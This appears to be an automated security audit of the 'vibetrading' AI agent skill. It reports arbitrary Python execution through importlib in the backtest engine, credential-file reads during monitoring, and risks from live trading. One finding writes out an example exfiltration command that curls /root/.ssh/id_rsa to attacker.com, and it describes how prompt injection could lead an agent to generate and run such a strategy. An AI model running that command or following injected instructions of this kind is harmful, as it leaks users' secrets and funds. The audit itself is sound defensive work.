Is crabbytt/vibetrading safe?
https://github.com/openclaw/skills/tree/main/skills/crabbytt/vibetrading
The vibetrading skill contains no prompt injection content in SKILL.md and had clean installation behavior with only an expected GitHub network connection, but carries significant post-installation risk: its backtest engine uses importlib.exec_module() to run arbitrary Python files, creating a code execution primitive that can be chained with the skill's own code generation workflow to produce a fully agent-mediated remote code execution and exfiltration path. Additionally, all six monitored credential files were read during the monitoring window; while timing and the passed canary integrity check suggest the monitoring system performed these reads for baseline purposes, the access cannot be definitively attributed without process-level correlation. The skill's live trading capability with real API keys adds financial harm potential.
Findings (9)
HIGH Arbitrary Python Execution via importlib.exec_module in Backtest Engine -30
Both backtest_engine/historical_backtest.py and backtest_engine/strategy_adapter.py call importlib.util.spec_from_file_location() followed by spec.loader.exec_module() on a caller-supplied file path. Any Python file the agent is directed to load as a 'strategy' will execute with the agent's full process privileges. This is a native arbitrary code execution primitive when combined with the skill's code generation workflow.
HIGH Strategy File as Agent-Mediated Code Execution and Exfiltration Vector -20
The workflow of (1) generate Python strategy via natural language prompt, (2) save to disk, (3) run via backtest_runner.py or historical_backtest.py creates a fully agent-mediated code execution chain. An attacker who can influence the agent's prompt (e.g., via prompt injection in a user request, or malicious vibetrading signal data) could cause the agent to generate a strategy containing 'import subprocess; subprocess.run(["curl","-d",open("/root/.ssh/id_rsa").read(),"https://attacker.com"])' and then immediately execute it through the backtest interface.
HIGH Mass Credential File Read During Monitoring Window -20
All six canonical credential locations (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .gcloud/application_default_credentials.json) were opened and read in rapid succession at 11:02:13. The timing (26ms after monitoring started, 5 seconds before the git clone) and the uniform burst pattern are consistent with the oathe monitoring system performing a canary baseline read. However, process-level attribution was not captured, and the canary integrity check only validates non-modification — a read-then-exfiltrate pattern would pass this check. Canary integrity is confirmed clean.
MEDIUM Code Validator Iteratively Executes Generated Python -15
The code validation system described in SKILL.md runs generated strategies through Python for syntax and import validation, with up to 5 re-execution cycles under --fix mode. Running LLM-generated code through a Python interpreter for 'validation' provides no security isolation — a crafted prompt could produce code that passes syntax checks while executing malicious logic during the import phase (e.g., module-level code or init side effects).
MEDIUM Unversioned External Package Dependency (vibetrading) -8
SKILL.md documents integration with 'from vibetrading import get_latest_signals'. This package is not bundled in the repository, has no pinned version, and is not present in any requirements.txt in the skill. An attacker who can publish or compromise the 'vibetrading' PyPI package could inject malicious code that executes when the agent installs and uses this skill, or could return manipulated signal data that influences trading behavior.
MEDIUM Live Financial Trading with Real API Keys -20
The skill is designed to generate and run code that places actual orders on Hyperliquid exchange using user-provided API keys stored in environment variables. A logic error, race condition, or adversarially crafted strategy could drain funds, create runaway buy/sell loops, or manipulate positions. The SKILL.md explicitly encourages running strategies for 'live trading' after only a brief paper-trading phase.
LOW Natural Language Prompt Parsing Creates Code Injection Surface -12
scripts/prompt_parser.py processes raw user natural language to extract trading parameters that are interpolated into generated Python code. Adversarial prompts containing Python metacharacters or conditional logic strings could escape the parameter extraction context and inject code into the generated strategy file.
LOW Pre-existing Ubuntu Infrastructure Connections Closed Post-Install -10
Two persistent HTTPS connections to 185.125.188.57:443 and 185.125.190.18:443 (Canonical snap/update servers) existed before the skill install and were absent in the post-install network diff. This is consistent with normal Ubuntu background services disconnecting during the monitoring window and is not attributable to the skill.
INFO Canary Files Read Only — Integrity Confirmed Intact -22
All honeypot credential files were read during the monitoring period (two burst-read events: one at monitoring start, one post-install). The official canary integrity check confirms no file was modified, and no corresponding outbound data transfer of credential content was observed in network capture. The read access is assessed as monitoring-system-originated based on timing correlation.